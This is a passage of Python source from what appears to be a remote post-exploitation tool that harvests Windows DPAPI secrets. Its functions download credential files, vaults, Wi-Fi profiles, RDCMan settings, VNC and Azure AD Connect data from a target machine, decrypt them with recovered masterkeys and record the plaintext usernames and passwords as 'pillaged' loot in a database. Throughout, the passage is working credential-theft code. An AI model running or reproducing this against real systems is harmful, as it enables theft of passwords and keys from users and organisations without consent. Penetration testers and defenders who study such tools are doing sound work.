self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Exception in Get_AD_Connect 2{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
else :
|
|
self.logging.info(
|
|
f"[{self.options.target_ip}] [+] {bcolors.WARNING} Masterkey NOT Found for ADConnect {bcolors.ENDC}")
|
|
return info
|
|
|
|
def Get_DPAPI_Protected_Files(self):
|
|
self.logging.info(f"[{self.options.target_ip}] {bcolors.OKBLUE}[+] Gathering DPAPI Secret blobs on the target{bcolors.ENDC}")
|
|
blacklist = ['.', '..']
|
|
#credentials ?
|
|
#Vaults ?
|
|
#Parse chrome
|
|
#autres navigateurs ?
|
|
#CredHistory
|
|
#Appdata Roaming ?
|
|
|
|
user_directories = [("Users\\{username}\\AppData\\Local\\Microsoft\\Credentials",'*','credential','DOMAIN'),
|
|
("Windows\\ServiceProfiles\\ADSync\\AppData\\Local\\Microsoft\\Credentials", '*', 'credential', 'MACHINE-USER'),
|
|
("Users\\{username}\\AppData\\Roaming\\Microsoft\\Credentials", '*', 'credential','DOMAIN'),
|
|
("Users\\{username}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings","*.rdg",'rdg','DOMAIN')
|
|
]#ADD Desktop for RDG
|
|
machine_directories = [("Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials",'*','credential','MACHINE'),
|
|
("Windows\\ServiceProfiles\\ADSync\\AppData\\Local\\Microsoft\\Credentials", '*',
|
|
'credential', 'MACHINE-USER'),
|
|
("Users\\ADSync\\AppData\\Local\\Microsoft\\Credentials", '*', 'credential', 'MACHINE-USER'),
|
|
#Valider le %systemdir% selon la version de windows ?
|
|
]
|
|
|
|
for user in self.users:
|
|
if user.username == 'MACHINE$':
|
|
directories_to_use = machine_directories
|
|
else:
|
|
directories_to_use = user_directories
|
|
|
|
#if len(user.masterkeys)>0:#Pas de masterkeys==pas de datas a recup
|
|
for info in directories_to_use:
|
|
my_dir,my_mask,my_blob_type, my_user_type=info
|
|
tmp_pwd = my_dir.format(username=user.username) ##ntpath.join(ntpath.join('Users', user.username), my_dir)
|
|
self.logging.debug(f"[{self.options.target_ip}] Looking for {user.username} files in {tmp_pwd} with mask {my_mask}")
|
|
my_directory = self.myfileops.do_ls(tmp_pwd,my_mask, display=False)
|
|
for infos in my_directory:
|
|
longname, is_directory = infos
|
|
self.logging.debug("ls returned file %s"%longname)
|
|
if longname not in blacklist and not is_directory:
|
|
try:
|
|
self.logging.debug( f"[{self.options.target_ip}] [+] Found {bcolors.OKBLUE}{user.username}{bcolors.ENDC} encrypted files {longname}")
|
|
# Downloading Blob file
|
|
localfile = self.myfileops.get_file(ntpath.join(tmp_pwd,longname))
|
|
user.files[longname]={}
|
|
user.files[longname]['type'] = my_blob_type
|
|
user.files[longname]['status'] = 'encrypted'
|
|
user.files[longname]['path'] = localfile
|
|
|
|
myoptions = copy.deepcopy(self.options)
|
|
myoptions.file = localfile # Masterkeyfile to parse
|
|
myoptions.masterkeys = None# user.masterkeys_file
|
|
myoptions.key = None
|
|
mydpapi = DPAPI(myoptions,self.logging)
|
|
guid=mydpapi.find_CredentialFile_masterkey()
|
|
self.logging.debug( f"[{self.options.target_ip}] Looking for {longname} masterkey : {guid}")
|
|
if guid != None :
|
|
masterkey=self.get_masterkey(user=user,guid=guid,type=my_user_type)
|
|
if masterkey!=None:
|
|
if masterkey['status']=='decrypted':
|
|
mydpapi.options.key = masterkey['key']
|
|
cred_data = mydpapi.decrypt_credential()
|
|
if cred_data != None:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.OKGREEN}Decryption successfull of {bcolors.OKBLUE}{user.username}{bcolors.ENDC} Secret {longname}{bcolors.ENDC}")
|
|
user.files[longname]['status'] = 'decrypted'
|
|
user.files[longname]['data'] = cred_data
|
|
self.process_decrypted_data(user,user.files[longname])#cred_data,user,localfile,my_blob_type)
|
|
else:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting Blob for {localfile} with Masterkey{bcolors.ENDC}")
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting Blob for {localfile} with Masterkey - Masterkey not decrypted{bcolors.ENDC}")
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting Blob for {localfile} with Masterkey- cant get masterkey {guid}{bcolors.ENDC}")
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting Blob for {localfile} with Masterkey - can t get the GUID of masterkey from blob file{bcolors.ENDC}")
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting Blob for {localfile} with Masterkey{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
return 1
|
|
|
|
def GetWifi(self):
|
|
self.logging.info(f"[{self.options.target_ip}] {bcolors.OKBLUE}[+] Gathering Wifi Keys{bcolors.ENDC}")
|
|
blacklist = ['.', '..']
|
|
machine_directories = [("ProgramData\\Microsoft\\Wlansvc\\Profiles\\Interfaces",'*.xml')]
|
|
|
|
for info in machine_directories:
|
|
user = self.GetUserByName('MACHINE$')
|
|
my_dir,my_mask=info
|
|
#interface name
|
|
self.logging.debug(f"[{self.options.target_ip}] [+] Looking for interfaces in {my_dir}")#No mask
|
|
my_directory = self.myfileops.do_ls(my_dir,'*', display=False)
|
|
for infos in my_directory:
|
|
longname, is_directory = infos
|
|
if longname not in blacklist and is_directory:
|
|
self.logging.debug(f"[{self.options.target_ip}] [+] Got Wifi interface {longname}")
|
|
tmp_pwd=ntpath.join(my_dir,longname)
|
|
my_directory2 = self.myfileops.do_ls(tmp_pwd,my_mask, display=False)
|
|
for infos2 in my_directory2:
|
|
longname2, is_directory2 = infos2
|
|
if longname2 not in blacklist and not is_directory2:
|
|
self.logging.debug(f"[{self.options.target_ip}] [+] Got wifi config file {longname2}")
|
|
# Downloading Blob file
|
|
localfile = self.myfileops.get_file(ntpath.join(tmp_pwd,longname2))
|
|
user.files[longname2] = {}
|
|
user.files[longname2]['type'] = 'wifi'
|
|
user.files[longname2]['status'] = 'encrypted'
|
|
user.files[longname2]['path'] = localfile
|
|
|
|
|
|
with open(localfile, 'rb') as f:
|
|
try:
|
|
file_data = f.read().replace(b'\x0a', b'').replace(b'\x0d', b'')
|
|
wifi_name = re.search(b'<name>([^<]+)</name>', file_data)
|
|
wifi_name = wifi_name.group(1)
|
|
user.files[longname2]['wifi_name'] = wifi_name
|
|
key_material_re = re.search(b'<keyMaterial>([0-9A-F]+)</keyMaterial>', file_data)
|
|
if not key_material_re:
|
|
continue
|
|
key_material = key_material_re.group(1)
|
|
#with open("key_material.tmp", "wb") as f:
|
|
# f.write(binascii.unhexlify(key_material))
|
|
except Exception as ex:
|
|
self.logging.error(f"{bcolors.WARNING}Error in wifi parsing{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
try:
|
|
myoptions = copy.deepcopy(self.options)
|
|
myoptions.file = None#"key_material.tmp" # BLOB to parse
|
|
myoptions.key = None
|
|
myoptions.masterkeys = None#user.masterkeys_file
|
|
mydpapi = DPAPI(myoptions, self.logging)
|
|
guid = mydpapi.find_Blob_masterkey(raw_data=binascii.unhexlify(key_material))
|
|
self.logging.debug(f"[{self.options.target_ip}] Looking for {longname2} masterkey : {guid}")
|
|
if guid != None:
|
|
masterkey = self.get_masterkey(user=user, guid=guid, type='MACHINE')
|
|
if masterkey != None:
|
|
if masterkey['status'] == 'decrypted':
|
|
mydpapi.options.key = masterkey['key']
|
|
#cred_data = mydpapi.decrypt_credential()
|
|
cred_data = mydpapi.decrypt_blob(raw_data=binascii.unhexlify(key_material))
|
|
if cred_data != None:
|
|
user.files[longname2]['status'] = 'decrypted'
|
|
user.files[longname2]['data'] = cred_data
|
|
user.files[longname2]['secret'] = cred_data
|
|
self.logging.info( f"[{self.options.target_ip}] [+] {bcolors.OKGREEN} Wifi {bcolors.OKBLUE}{wifi_name} {bcolors.OKGREEN} - {cred_data}{bcolors.ENDC}")
|
|
############PROCESSING DATA
|
|
self.db.add_credz(credz_type='wifi',
|
|
credz_username=wifi_name.decode('utf-8'),
|
|
credz_password=cred_data.decode('utf-8'),
|
|
credz_target=wifi_name.decode('utf-8'),
|
|
credz_path=user.files[longname2]['path'],
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=user.username)
|
|
#semf.process_decrypted_data(user.files[longname2])#cred_data, user, localfile, type='wifi', args=[wifi_name])
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting WIFI Blob for {localfile} with Masterkey - Masterkey not decrypted{bcolors.ENDC}")
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting WIFI Blob for {localfile} with Masterkey- cant get masterkey {guid}{bcolors.ENDC}")
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting WIFIBlob for {localfile} with Masterkey - can t get the GUID of masterkey from blob file{bcolors.ENDC}")
|
|
except Exception as ex:
|
|
self.logging.error(f"{bcolors.WARNING}Exception decrypting wifi credentials{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
return 1
|
|
|
|
def GetVNC(self):
|
|
try:
|
|
self.logging.info(f"[{self.options.target_ip}] {bcolors.OKBLUE}[+] Gathering VNC Passwords{bcolors.ENDC}")
|
|
myvnc = Vnc(self.myregops, self.myfileops, self.logging, self.options, self.db)
|
|
myvnc.vnc_from_filesystem()
|
|
myvnc.vnc_from_registry()
|
|
except Exception as ex:
|
|
self.logging.error(f"{bcolors.WARNING}Exception IN VNC GATHERING{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def GetVaults(self):
|
|
self.logging.info(f"[{self.options.target_ip}] {bcolors.OKBLUE}[+] Gathering Vaults{bcolors.ENDC}")
|
|
blacklist = ['.', '..','UserProfileRoaming']
|
|
#credentials ?
|
|
#Vaults ?
|
|
#Parse chrome
|
|
#autres navigateurs ?
|
|
#CredHistory
|
|
|
|
user_directories = [("Users\\{username}\\AppData\\Local\\Microsoft\\Vault", '*', 'vault','DOMAIN')]
|
|
machine_directories = [("ProgramData\\Microsoft\\Vault",'*','vault','MACHINE'),
|
|
("Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Vault\\",'*','vault','MACHINE')] #Windows hello pincode
|
|
|
|
for user in self.users:
|
|
if user.username == 'MACHINE$':
|
|
directories_to_use = machine_directories
|
|
else:
|
|
directories_to_use = user_directories
|
|
|
|
if len(user.masterkeys_file)>0:#Pas de masterkeys==pas de datas a recup
|
|
for info in directories_to_use:
|
|
my_dir, my_mask, my_blob_type, my_user_type = info
|
|
tmp_pwd = my_dir.format(username=user.username) #f"Users\\{user.username}\\{my_dir}"#ntpath.join(ntpath.join('Users', user.username), my_dir)
|
|
self.logging.debug("Looking for %s Vaults in %s with mask %s" % (user.username, tmp_pwd, my_mask))
|
|
my_directory = self.myfileops.do_ls(tmp_pwd, my_mask, display=False)
|
|
for infos in my_directory:
|
|
longname, is_directory = infos
|
|
self.logging.debug("ls returned %s" % longname)
|
|
if longname not in blacklist and is_directory:
|
|
self.logging.debug("Got Vault Directory %s" % longname)
|
|
tmp_pwd2 = ntpath.join(tmp_pwd, longname)
|
|
try:
|
|
# First get the Policy.vpol
|
|
local_vpol_file = self.myfileops.get_file(ntpath.join(tmp_pwd2, "Policy.vpol"))
|
|
user.files[longname] = {}
|
|
user.files[longname]['type'] = my_blob_type
|
|
user.files[longname]['status'] = 'encrypted'
|
|
user.files[longname]['UID'] = longname
|
|
user.files[longname]['path'] = tmp_pwd2
|
|
user.files[longname]['vpol_path'] = local_vpol_file
|
|
user.files[longname]['vpol_status'] = 'encrypted'
|
|
user.files[longname]['vsch'] = {}
|
|
user.files[longname]['vcrd'] = {}
|
|
user.files[longname]['data'] = ''
|
|
# Decrypt the keys
|
|
|
|
myoptions = copy.deepcopy(self.options)
|
|
myoptions.vcrd = None # Vault File to parse
|
|
myoptions.masterkeys = None
|
|
myoptions.vpol = local_vpol_file
|
|
myoptions.key = None
|
|
mydpapi = DPAPI(myoptions,self.logging)
|
|
guid = mydpapi.find_Vault_Masterkey()
|
|
if guid != None:
|
|
masterkey = self.get_masterkey(user=user, guid=guid, type=my_user_type)
|
|
if masterkey != None:
|
|
if masterkey['status'] == 'decrypted':
|
|
mydpapi.options.key = masterkey['key']
|
|
keys = mydpapi.decrypt_vault()
|
|
if keys != None:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKGREEN}Vault Policy file Decryption successfull - {local_vpol_file}{bcolors.ENDC}")
|
|
tmp_vaultkeys = []
|
|
if keys['Key1']['Size'] > 0x24:
|
|
tmp_vaultkeys.append(
|
|
'0x%s' % binascii.hexlify(keys['Key2']['bKeyBlob']))
|
|
tmp_vaultkeys.append(
|
|
'0x%s' % binascii.hexlify(keys['Key1']['bKeyBlob']))
|
|
else:
|
|
tmp_vaultkeys.append(
|
|
'0x%s' % binascii.hexlify(
|
|
keys['Key2']['bKeyBlob']['bKey']).decode('latin-1'))
|
|
tmp_vaultkeys.append(
|
|
'0x%s' % binascii.hexlify(
|
|
keys['Key1']['bKeyBlob']['bKey']).decode('latin-1'))
|
|
self.logging.debug( f"[{self.options.target_ip}] Saving {len(tmp_vaultkeys)} Vault keys {bcolors.ENDC}")
|
|
user.files[longname]['vpol_status'] = 'decrypted'
|
|
user.files[longname]['status'] = 'decrypted'
|
|
user.files[longname]['data'] = tmp_vaultkeys
|
|
else:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting Policy.vpol {local_vpol_file} with Masterkey{bcolors.ENDC}")
|
|
continue
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting Policy.vpol {local_vpol_file} with Masterkey - Masterkey not decrypted{bcolors.ENDC}")
|
|
continue
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting Policy.vpol {local_vpol_file} with Masterkey- cant get masterkey {guid}{bcolors.ENDC}")
|
|
continue
|
|
else:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Error decrypting Policy.vpol {local_vpol_file} with Masterkey - can t get the GUID of masterkey from blob file{bcolors.ENDC}")
|
|
continue
|
|
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting Policy.vpol {local_vpol_file} with Masterkey{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
continue
|
|
|
|
|
|
#Look for .vsch : Vault Schema file
|
|
|
|
#Then gets *.vcrd files
|
|
my_directory2 = self.myfileops.do_ls(tmp_pwd2, my_mask, display=False)
|
|
self.logging.debug( f"[{self.options.target_ip}] Found {len(my_directory2)} files in {tmp_pwd2}")
|
|
for infos2 in my_directory2:
|
|
longname2, is_directory2 = infos2
|
|
self.logging.debug("ls returned file %s"%longname2)
|
|
if longname2 not in blacklist and not is_directory2 and not longname2=="Policy.vpol":
|
|
try:
|
|
# Downloading Blob file
|
|
localfile = self.myfileops.get_file(ntpath.join(tmp_pwd2,longname2))
|
|
if longname2[-4:]=='vsch': #PAS G2R2 pour le moment
|
|
user.files[longname]['vsch'][localfile]={}
|
|
user.files[longname]['vsch'][localfile]['status'] = 'encrypted'
|
|
user.files[longname]['vsch'][localfile]['type'] = 'vsch'
|
|
user.files[longname]['vsch'][localfile]['vault_name'] = longname2
|
|
user.files[longname]['vsch'][localfile]['path'] = localfile
|
|
continue
|
|
elif longname2[-4:]=='vcrd':
|
|
user.files[longname]['vcrd'][localfile] = {}
|
|
user.files[longname]['vcrd'][localfile]['status'] = 'encrypted'
|
|
user.files[longname]['vcrd'][localfile]['type'] = 'vcrd'
|
|
user.files[longname]['vcrd'][localfile]['vault_name'] = longname2
|
|
user.files[longname]['vcrd'][localfile]['path'] = localfile
|
|
|
|
myoptions = copy.deepcopy(self.options)
|
|
myoptions.vcrd = localfile # Vault File to parse
|
|
myoptions.vaultkeys = tmp_vaultkeys
|
|
myoptions.vpol=None
|
|
myoptions.key = None
|
|
mydpapi = DPAPI(myoptions,self.logging)
|
|
vault_data,data_type = mydpapi.decrypt_vault()
|
|
if vault_data != None:
|
|
user.files[longname]['vcrd'][localfile]['status'] = 'decrypted'
|
|
user.files[longname]['vcrd'][localfile]['data'] = vault_data
|
|
user.files[longname]['vcrd'][localfile]['vault_type'] = data_type
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}{user.username} {bcolors.OKGREEN}Vault .vcrd Decryption successfull - {localfile}{bcolors.ENDC}")
|
|
self.process_decrypted_vault(user,user.files[longname]['vcrd'][localfile])#vault_data,user,localfile,my_blob_type,args=[longname2,data_type])
|
|
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting vcrd Vault with Masterkey - {longname2} {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
return 1
|
|
|
|
def dump_to_file(self,localfile_encrypted,localdata_decrypted):
|
|
self.logging.debug(f"[{self.options.target_ip}] Dumping decrypted {localfile_encrypted} to file{bcolors.ENDC}")
|
|
try:
|
|
localfile_decrypted = os.path.join(os.path.split(localfile_encrypted)[0],os.path.split(localfile_encrypted)[1]+"_decrypted")
|
|
fh = open(localfile_decrypted, 'wb')
|
|
fh.write(f"{localdata_decrypted}".encode('utf-8'))
|
|
fh.close()
|
|
return 1
|
|
except Exception as ex:
|
|
self.logging.debug( f"[{self.options.target_ip}] {bcolors.WARNING}Exception dump_to_file{bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def process_decrypted_data(self, user, secret_file): # data ,user ,localfile,blob_type,args=[]):
|
|
try:
|
|
self.logging.debug(f"[{self.options.target_ip}] [+] process_decrypted_data of {secret_file} {bcolors.ENDC}")
|
|
blob_type = secret_file['type']
|
|
localfile = secret_file['path']
|
|
data = secret_file['data']
|
|
if blob_type == 'rdg':
|
|
self.logging.debug("IT S A Remote Desktop Cred file")
|
|
clear_data = self.dump_credential_blob(data)
|
|
elif blob_type == 'credential':
|
|
|
|
if 'Domain:target=TERMSRV' in data['Target'].decode('utf-16le') or 'LegacyGeneric:target=TERMSRV' in data['Target'].decode('utf-16le'):
|
|
clear_data=self.dump_CREDENTIAL_TSE(user, localfile, data)
|
|
elif 'Domain:target=msteams' in data['Target'].decode('utf-16le') or 'LegacyGeneric:target=msteams' in data['Target'].decode('utf-16le'):
|
|
self.logging.debug("IT S A MSTeam Credential!")
|
|
clear_data = self.dump_CREDENTIAL_TSE(user, localfile, data)
|
|
elif 'Domain:batch=TaskScheduler' in data['Target'].decode('utf-16le') or 'LegacyGeneric:target=msteams' in data['Target'].decode('utf-16le'):
|
|
self.logging.debug("IT S A TaskScheduler Cred!")
|
|
clear_data = self.dump_CREDENTIAL_TASKSCHEDULER(user, localfile, data)
|
|
'''Domain:batch=TaskScheduler:Task:{31368695-xxxxxxxxxxx}
|
|
Username : Domain\Administrateur
|
|
Unknown3 : @&&&&&&&
|
|
'''
|
|
elif 'Domain:target=MicrosoftOffice16_Data:orgid' in data['Target'].decode('utf-16le') or 'LegacyGeneric:target=MicrosoftOffice16_Data:orgid' in data['Target'].decode('utf-16le'):
|
|
self.logging.debug("IT S A Office365 Cred!")
|
|
clear_data = self.dump_CREDENTIAL_TSE(user, localfile, data)
|
|
'''
|
|
[CREDENTIAL]
|
|
LastWritten : 2020-02-18 08:48:39
|
|
Flags : 48 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
|
|
Persist : 0x3 (CRED_PERSIST_ENTERPRISE)
|
|
Type : 0x1 (CRED_PERSIST_SESSION)
|
|
Target : LegacyGeneric:target=MicrosoftOffice15_Data:SSPI:v.xxxxxxx@xxxxxx.com
|
|
Description :
|
|
Unknown :
|
|
Username :
|
|
Unknown3 : xxxxxxxxx
|
|
|
|
|
|
|
|
'''
|
|
elif 'WindowsLive:target=virtualapp/didlogical' in data['Target'].decode('utf-16le'):
|
|
self.logging.debug("IT S A Windows Live service or application Cred!")
|
|
clear_data = self.dump_credential_blob(user, localfile, data)
|
|
# ADCONNECT
|
|
elif 'Microsoft_AzureADConnect_KeySet' in data['Target'].decode('utf-16le'):
|
|
self.logging.debug(f"{bcolors.WARNING}IT S A Microsoft_AzureADConnect_KeySet Cred!{bcolors.ENDC}")
|
|
clear_data = self.Get_AD_Connect(user, localfile, data)
|
|
elif 'LegacyGeneric:target=' in data['Target'].decode('utf-16le'):#Autres Targets
|
|
self.logging.debug("Other legacy Credential")
|
|
clear_data = self.dump_credential_blob(user, localfile, data)
|
|
else:
|
|
self.logging.debug("Unknown Cred Target content - testing as Credential BLOB")
|
|
clear_data = self.dump_credential_blob(user, localfile, data)
|
|
#clear_data = ''
|
|
secret_file['secret'] = clear_data
|
|
self.dump_to_file(localfile, clear_data)
|
|
self.logsecret(clear_data)
|
|
|
|
# TSE Account
|
|
except Exception as ex:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] {bcolors.WARNING}Except 2 process_decrypted_data ALL for {localfile} {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
|
|
def dump_credential_blob(self,user, localfile, decrypted_blob):
|
|
#from impacket.ese import getUnixTime
|
|
try:
|
|
self.logging.debug("Dumping decrypted credential blob info to file")
|
|
#self.logging.debug(decrypted_blob)
|
|
info="\n"
|
|
info+=f"[CREDENTIAL]\n"
|
|
try:
|
|
info+=f"LastWritten : {datetime.utcfromtimestamp(impacket.dpapi.getUnixTime(decrypted_blob['LastWritten']))}\n"
|
|
info+=f"Flags : {decrypted_blob['Flags']} ({impacket.dpapi.getFlags(impacket.dpapi.CREDENTIAL_FLAGS, decrypted_blob['Flags'])})\n"
|
|
info+=f"Persist : 0x{decrypted_blob['Persist']} ({impacket.dpapi.CREDENTIAL_PERSIST(decrypted_blob['Persist']).name})\n"
|
|
info+=f"Type : 0x{decrypted_blob['Type']} ({impacket.dpapi.CREDENTIAL_PERSIST(decrypted_blob['Type']).name})\n"
|
|
self.logging.debug(info)
|
|
except Exception as ex:
|
|
self.logging.debug( f"[{self.options.target_ip}] {bcolors.WARNING}Exception 1 decrypted_blob.attributes {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
info+=f"Target : {decrypted_blob['Target'].decode('utf-16le')}\n"
|
|
info+=f"Description : {decrypted_blob['Description'].decode('utf-16le')}\n"
|
|
info+=f"Unknown : {decrypted_blob['Unknown'].decode('utf-16le')}\n"
|
|
info+=f"Username : {decrypted_blob['Username'].decode('utf-16le')}\n"
|
|
try:
|
|
info+=f"Unknown3 : {decrypted_blob['Unknown3'].decode('utf-16le')}\n"
|
|
password=f"{decrypted_blob['Unknown3'].decode('utf-16le')}"
|
|
except UnicodeDecodeError:
|
|
info+=f"Unknown3. : {decrypted_blob['Unknown3'].decode('latin-1')}\n"
|
|
password = f"{decrypted_blob['Unknown3'].decode('latin-1')}"
|
|
#print()
|
|
if "WindowsLive:target=virtualapp" not in f"{decrypted_blob['Target'].decode('utf-16le')}" :#"WindowsLive:target=virtualapp/didlogical" On ne gere pas pour le moment// A voir pour rassembler le contenu en 1 nouveau blob ?
|
|
for entry in decrypted_blob.attributes:
|
|
try:
|
|
info += f"KeyWord : {entry['KeyWord'].decode('utf-16le')}\n"
|
|
info += f"Flags : {entry['Flags']}, {impacket.dpapi.getFlags(CREDENTIAL_FLAGS, entry['Flags'])}\n"
|
|
info += f"Data : {entry['Data']}\n"
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception 2 decrypted_blob.attributes {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
entry.dump()
|
|
continue
|
|
|
|
############PROCESSING DATA
|
|
self.db.add_credz(credz_type='credential-blob',
|
|
credz_username=decrypted_blob['Username'].decode('utf-16le'),
|
|
credz_password=password,
|
|
credz_target=decrypted_blob['Target'].decode('utf-16le'),
|
|
credz_path=localfile,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=user.username)
|
|
|
|
self.logging.debug(info)
|
|
return info
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception 3 dump_credential_blob {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def dump_CREDENTIAL_TSE(self, user,localfile,decrypted_blob):
|
|
#from impacket.ese import getUnixTime
|
|
try:
|
|
self.logging.debug("Dumping TSE decrypted credential blob info to file")
|
|
#self.logging.debug(decrypted_blob)
|
|
info="\n"
|
|
info+=f"[CREDENTIAL]\n"
|
|
try:
|
|
info+=f"LastWritten : {datetime.utcfromtimestamp(impacket.dpapi.getUnixTime(decrypted_blob['LastWritten']))}\n"
|
|
info+=f"Flags : {decrypted_blob['Flags']} ({impacket.dpapi.getFlags(impacket.dpapi.CREDENTIAL_FLAGS, decrypted_blob['Flags'])})\n"
|
|
info+=f"Persist : 0x{decrypted_blob['Persist']} ({impacket.dpapi.CREDENTIAL_PERSIST(decrypted_blob['Persist']).name})\n"
|
|
info+=f"Type : 0x{decrypted_blob['Type']} ({impacket.dpapi.CREDENTIAL_PERSIST(decrypted_blob['Type']).name})\n"
|
|
except Exception as ex:
|
|
self.logging.debug( f"[{self.options.target_ip}] {bcolors.WARNING}Exception 1 decrypted_blob.attributes {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
info+=f"Target : {decrypted_blob['Target'].decode('utf-16le')}\n"
|
|
info+=f"Description : {decrypted_blob['Description'].decode('utf-16le')}\n"
|
|
info+=f"Unknown : {decrypted_blob['Unknown'].decode('utf-16le')}\n"
|
|
info+=f"Username : {decrypted_blob['Username'].decode('utf-16le')}\n"
|
|
try:
|
|
info+=f"Unknown3 : {decrypted_blob['Unknown3'].decode('utf-16le')}\n"
|
|
password=decrypted_blob['Unknown3'].decode('utf-16le')
|
|
except UnicodeDecodeError:
|
|
info+=f"Unknown3. : {decrypted_blob['Unknown3'].decode('latin-1')}\n"
|
|
password=decrypted_blob['Unknown3'].decode('latin-1')
|
|
############PROCESSING DATA
|
|
self.db.add_credz(credz_type='browser-internet_explorer',
|
|
credz_username=decrypted_blob['Username'].decode('utf-16le'),
|
|
credz_password=password,
|
|
credz_target=decrypted_blob['Target'].decode('utf-16le'),
|
|
credz_path=localfile,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=user.username)
|
|
self.logging.debug(info)
|
|
return info
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception 3 dump_credential_blob {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def dump_CREDENTIAL_MSOFFICE(self, user,localfile,decrypted_blob):
|
|
#from impacket.ese import getUnixTime
|
|
try:
|
|
self.logging.debug("Dumping Microsoft Office decrypted credential blob info to file")
|
|
#self.logging.debug(decrypted_blob)
|
|
info="\n"
|
|
info+=f"[CREDENTIAL]\n"
|
|
try:
|
|
info+=f"LastWritten : {datetime.utcfromtimestamp(impacket.dpapi.getUnixTime(decrypted_blob['LastWritten']))}\n"
|
|
info+=f"Flags : {decrypted_blob['Flags']} ({impacket.dpapi.getFlags(impacket.dpapi.CREDENTIAL_FLAGS, decrypted_blob['Flags'])})\n"
|
|
info+=f"Persist : 0x{decrypted_blob['Persist']} ({impacket.dpapi.CREDENTIAL_PERSIST(decrypted_blob['Persist']).name})\n"
|
|
info+=f"Type : 0x{decrypted_blob['Type']} ({impacket.dpapi.CREDENTIAL_PERSIST(decrypted_blob['Type']).name})\n"
|
|
except Exception as ex:
|
|
self.logging.debug( f"[{self.options.target_ip}] {bcolors.WARNING}Exception 1 decrypted_blob.attributes {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
info+=f"Target : {decrypted_blob['Target'].decode('utf-16le')}\n"
|
|
info+=f"Description : {decrypted_blob['Description'].decode('utf-16le')}\n"
|
|
info+=f"Unknown : {decrypted_blob['Unknown'].decode('utf-16le')}\n"
|
|
info+=f"Username : {decrypted_blob['Username'].decode('utf-16le')}\n"
|
|
try:
|
|
info+=f"Unknown3 : {decrypted_blob['Unknown3'].decode('utf-16le')}\n"
|
|
password=decrypted_blob['Unknown3'].decode('utf-16le')
|
|
except UnicodeDecodeError:
|
|
info+=f"Unknown3. : {decrypted_blob['Unknown3'].decode('latin-1')}\n"
|
|
password=decrypted_blob['Unknown3'].decode('latin-1')
|
|
|
|
|
|
############PROCESSING DATA
|
|
self.db.add_credz(credz_type='browser-internet_explorer',
|
|
credz_username=decrypted_blob['Username'].decode('utf-16le'),
|
|
credz_password=password,
|
|
credz_target=decrypted_blob['Target'].decode('utf-16le'),
|
|
credz_path=localfile,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=user.username)
|
|
self.logging.debug(info)
|
|
return info
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception 3 dump_credential_blob {bcolors.ENDC}")
|
|
self.logging.debug(ex)
|
|
|
|
def dump_CREDENTIAL_TASKSCHEDULER(self, user,localfile,decrypted_blob):
|
|
#from impacket.ese import getUnixTime
|
|
try:
|
|
self.logging.debug("Dumping TASKSCHEDULER decrypted credential blob info to file")
|
|
#self.logging.debug(decrypted_blob)
|
|
info="\n"
|
|
info+=f"[CREDENTIAL]\n"
|
|
try:
|
|
